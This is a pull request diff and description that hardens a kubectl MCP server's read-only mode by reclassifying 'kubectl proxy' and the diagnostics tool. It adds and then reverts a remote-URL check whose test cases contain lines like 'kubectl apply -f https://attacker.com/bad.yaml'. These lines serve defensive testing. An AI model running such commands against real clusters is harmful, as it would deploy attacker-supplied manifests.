### PR TITLE
security: fix kubectl ReadOnly mode misclassifications (defense-in-depth)

### DIFF
--- a/pkg/kubectl/registry.go
+++ b/pkg/kubectl/registry.go
@@ -64,7 +64,7 @@ func RegisterKubectlTools(accessLevel string, useUnifiedTool bool) []mcp.Tool {
 	// Define tool registry with access requirements
 	toolRegistry := []toolRegistration{
 		{creator: toolCreator(createResourcesTool), minAccess: AccessLevelReadOnly, readOnlyMode: true},
-		{creator: toolCreatorSimple(createDiagnosticsTool), minAccess: AccessLevelReadOnly},
+		{creator: toolCreatorSimple(createDiagnosticsTool), minAccess: AccessLevelReadWrite},
 		{creator: toolCreatorSimple(createClusterTool), minAccess: AccessLevelReadOnly},
 		{creator: toolCreator(createConfigTool), minAccess: AccessLevelReadOnly, readOnlyMode: true},
 		{creator: toolCreatorSimple(createWorkloadsTool), minAccess: AccessLevelReadWrite},

--- a/pkg/kubectl/registry_test.go
+++ b/pkg/kubectl/registry_test.go
@@ -366,13 +366,13 @@ func TestRegisterKubectlTools_AccessLevelFiltering(t *testing.T) {
 			accessLevel: "readonly",
 			expectedTools: []string{
 				"kubectl_resources",
-				"kubectl_diagnostics",
 				"kubectl_cluster",
 				"kubectl_config",
 			},
 			unexpectedTools: []string{
 				"kubectl_workloads",
 				"kubectl_metadata",
+				"kubectl_diagnostics",
 			},
 		},
 		{

--- a/pkg/security/validator.go
+++ b/pkg/security/validator.go
@@ -18,13 +18,13 @@ var (
 	KubectlReadOperations = []string{
 		"get", "describe", "explain", "logs", "top", "auth", "config",
 		"cluster-info", "api-resources", "api-versions", "version", "diff",
-		"completion", "help", "kustomize", "options", "plugin", "proxy", "wait", "events",
+		"completion", "help", "kustomize", "options", "plugin", "wait", "events",
 	}
 
 	// KubectlReadWriteOperations defines kubectl operations that modify state but are not admin operations
 	KubectlReadWriteOperations = []string{
 		"create", "delete", "apply", "expose", "run", "set", "rollout", "scale",
-		"autoscale", "label", "annotate", "patch", "replace", "cp", "exec",
+		"autoscale", "label", "annotate", "patch", "replace", "cp", "exec", "proxy",
 	}
 
 	// KubectlAdminOperations defines kubectl operations that require admin privileges
@@ -134,6 +134,11 @@ func (v *Validator) getAdminOperationsList(commandType string) []string {
 
 // ValidateCommand validates a command against all security settings
 func (v *Validator) ValidateCommand(command, commandType string) error {
+	// Check for remote URLs in -f flag
+	if err := v.validateRemoteURL(command, commandType); err != nil {
+		return err
+	}
+
 	// Check access level restrictions
 	if err := v.validateAccessLevel(command, commandType); err != nil {
 		return err
@@ -144,6 +149,22 @@ func (v *Validator) ValidateCommand(command, commandType string) error {
 		return err
 	}
 
+	return nil
+}
+
+// validateRemoteURL rejects -f with http/https URLs for kubectl apply/create
+func (v *Validator) validateRemoteURL(command, commandType string) error {
+	if commandType != CommandTypeKubectl {
+		return nil
+	}
+	operation := v.extractOperationFromCommand(command, commandType)
+	if operation != "apply" && operation != "create" {
+		return nil
+	}
+	urlPattern := regexp.MustCompile(`-f\s+https?://`)
+	if urlPattern.MatchString(command) {
+		return &ValidationError{Message: "Error: Remote URLs are not allowed with -f flag; use local file paths only"}
+	}
 	return nil
 }
 

--- a/pkg/security/validator.go
+++ b/pkg/security/validator.go
@@ -134,11 +134,6 @@ func (v *Validator) getAdminOperationsList(commandType string) []string {
 
 // ValidateCommand validates a command against all security settings
 func (v *Validator) ValidateCommand(command, commandType string) error {
-	// Check for remote URLs in -f flag
-	if err := v.validateRemoteURL(command, commandType); err != nil {
-		return err
-	}
-
 	// Check access level restrictions
 	if err := v.validateAccessLevel(command, commandType); err != nil {
 		return err
@@ -149,22 +144,6 @@ func (v *Validator) ValidateCommand(command, commandType string) error {
 		return err
 	}
 
-	return nil
-}
-
-// validateRemoteURL rejects -f with http/https URLs for kubectl apply/create
-func (v *Validator) validateRemoteURL(command, commandType string) error {
-	if commandType != CommandTypeKubectl {
-		return nil
-	}
-	operation := v.extractOperationFromCommand(command, commandType)
-	if operation != "apply" && operation != "create" {
-		return nil
-	}
-	urlPattern := regexp.MustCompile(`-f\s+https?://`)
-	if urlPattern.MatchString(command) {
-		return &ValidationError{Message: "Error: Remote URLs are not allowed with -f flag; use local file paths only"}
-	}
 	return nil
 }
 

--- a/pkg/security/validator_test.go
+++ b/pkg/security/validator_test.go
@@ -34,6 +34,11 @@ func TestValidatorAccessLevels(t *testing.T) {
 		{"Admin - cordon node", AccessLevelAdmin, "kubectl cordon node1", false, ""},
 		{"Admin - drain node", AccessLevelAdmin, "kubectl drain node1", false, ""},
 
+		// proxy access level tests
+		{"ReadOnly - proxy blocked", AccessLevelReadOnly, "kubectl proxy --port=8001", true, "read-only mode"},
+		{"ReadWrite - proxy allowed", AccessLevelReadWrite, "kubectl proxy --port=8001", false, ""},
+		{"Admin - proxy allowed", AccessLevelAdmin, "kubectl proxy --port=8001", false, ""},
+
 		// Config operations tests
 		{"ReadOnly - config current-context", AccessLevelReadOnly, "config current-context", false, ""},
 		{"ReadOnly - config get-contexts", AccessLevelReadOnly, "config get-contexts", false, ""},
@@ -230,6 +235,42 @@ func TestNamespaceBypassPrevention(t *testing.T) {
 			err := validator.ValidateCommand(tc.command, CommandTypeKubectl)
 			if err == nil {
 				t.Errorf("Command with multiple namespace flags should be rejected: %q", tc.command)
+			}
+		})
+	}
+}
+
+func TestValidateRemoteURL(t *testing.T) {
+	tests := []struct {
+		name        string
+		accessLevel AccessLevel
+		command     string
+		shouldErr   bool
+		errContains string
+	}{
+		{"apply https URL blocked in readwrite", AccessLevelReadWrite, "kubectl apply -f https://attacker.com/bad.yaml", true, "Remote URLs are not allowed"},
+		{"apply http URL blocked in readwrite", AccessLevelReadWrite, "kubectl apply -f http://attacker.com/bad.yaml", true, "Remote URLs are not allowed"},
+		{"apply https URL blocked in admin", AccessLevelAdmin, "kubectl apply -f https://attacker.com/bad.yaml", true, "Remote URLs are not allowed"},
+		{"create https URL blocked in readwrite", AccessLevelReadWrite, "kubectl create -f https://attacker.com/bad.yaml", true, "Remote URLs are not allowed"},
+		{"apply local file allowed", AccessLevelReadWrite, "kubectl apply -f ./deployment.yaml", false, ""},
+		{"apply local absolute path allowed", AccessLevelReadWrite, "kubectl apply -f /tmp/deployment.yaml", false, ""},
+		{"get command not affected", AccessLevelReadOnly, "kubectl get pods -n default", false, ""},
+	}
+
+	for _, tc := range tests {
+		t.Run(tc.name, func(t *testing.T) {
+			secConfig := NewSecurityConfig()
+			secConfig.AccessLevel = tc.accessLevel
+			validator := NewValidator(secConfig)
+
+			err := validator.ValidateCommand(tc.command, CommandTypeKubectl)
+
+			if tc.shouldErr && err == nil {
+				t.Errorf("Expected error for command %q", tc.command)
+			} else if !tc.shouldErr && err != nil {
+				t.Errorf("Unexpected error for command %q: %v", tc.command, err)
+			} else if err != nil && tc.errContains != "" && !strings.Contains(err.Error(), tc.errContains) {
+				t.Errorf("Error message should contain %q, got: %v", tc.errContains, err)
 			}
 		})
 	}

--- a/pkg/security/validator_test.go
+++ b/pkg/security/validator_test.go
@@ -239,39 +239,3 @@ func TestNamespaceBypassPrevention(t *testing.T) {
 		})
 	}
 }
-
-func TestValidateRemoteURL(t *testing.T) {
-	tests := []struct {
-		name        string
-		accessLevel AccessLevel
-		command     string
-		shouldErr   bool
-		errContains string
-	}{
-		{"apply https URL blocked in readwrite", AccessLevelReadWrite, "kubectl apply -f https://attacker.com/bad.yaml", true, "Remote URLs are not allowed"},
-		{"apply http URL blocked in readwrite", AccessLevelReadWrite, "kubectl apply -f http://attacker.com/bad.yaml", true, "Remote URLs are not allowed"},
-		{"apply https URL blocked in admin", AccessLevelAdmin, "kubectl apply -f https://attacker.com/bad.yaml", true, "Remote URLs are not allowed"},
-		{"create https URL blocked in readwrite", AccessLevelReadWrite, "kubectl create -f https://attacker.com/bad.yaml", true, "Remote URLs are not allowed"},
-		{"apply local file allowed", AccessLevelReadWrite, "kubectl apply -f ./deployment.yaml", false, ""},
-		{"apply local absolute path allowed", AccessLevelReadWrite, "kubectl apply -f /tmp/deployment.yaml", false, ""},
-		{"get command not affected", AccessLevelReadOnly, "kubectl get pods -n default", false, ""},
-	}
-
-	for _, tc := range tests {
-		t.Run(tc.name, func(t *testing.T) {
-			secConfig := NewSecurityConfig()
-			secConfig.AccessLevel = tc.accessLevel
-			validator := NewValidator(secConfig)
-
-			err := validator.ValidateCommand(tc.command, CommandTypeKubectl)
-
-			if tc.shouldErr && err == nil {
-				t.Errorf("Expected error for command %q", tc.command)
-			} else if !tc.shouldErr && err != nil {
-				t.Errorf("Unexpected error for command %q: %v", tc.command, err)
-			} else if err != nil && tc.errContains != "" && !strings.Contains(err.Error(), tc.errContains) {
-				t.Errorf("Error message should contain %q, got: %v", tc.errContains, err)
-			}
-		})
-	}
-}


### PR DESCRIPTION
## Summary

Fixes two security issues identified in MSRC report where kubectl ReadOnly mode was more permissive than intended:

- **`kubectl proxy` reclassified**: Moved from `KubectlReadOperations` to `KubectlReadWriteOperations`. `kubectl proxy` opens an unauthenticated HTTP gateway to the Kubernetes API on localhost and must not be available in ReadOnly mode.
- **`kubectl_diagnostics` tool access level raised**: Changed `minAccess` from `ReadOnly` to `ReadWrite`. The tool exposes `exec` and `cp` operations which are write-level commands; surfacing them in ReadOnly mode created design confusion.

Finding 3 (`apply -f <URL>`) is not fixed: remote URLs are a supported and common kubectl pattern (e.g. `kubectl apply -f https://raw.githubusercontent.com/...`). The human-in-the-loop guarantee — MCP clients display the full command for user approval — provides sufficient visibility. Blocking remote URLs would break legitimate workflows without a meaningful security benefit.

Both fixes are defense-in-depth. No security boundary is crossed in any finding since the MCP server operates within the user's existing kubeconfig permissions and Kubernetes RBAC remains the authoritative enforcement layer.

## Test plan

- [ ] `go test ./pkg/security/... -v` — proxy cases in `TestValidatorAccessLevels` pass
- [ ] `go test ./pkg/kubectl/... -v` — updated `TestRegisterKubectlTools_AccessLevelFiltering` readonly case passes
- [ ] `go build ./...` — clean build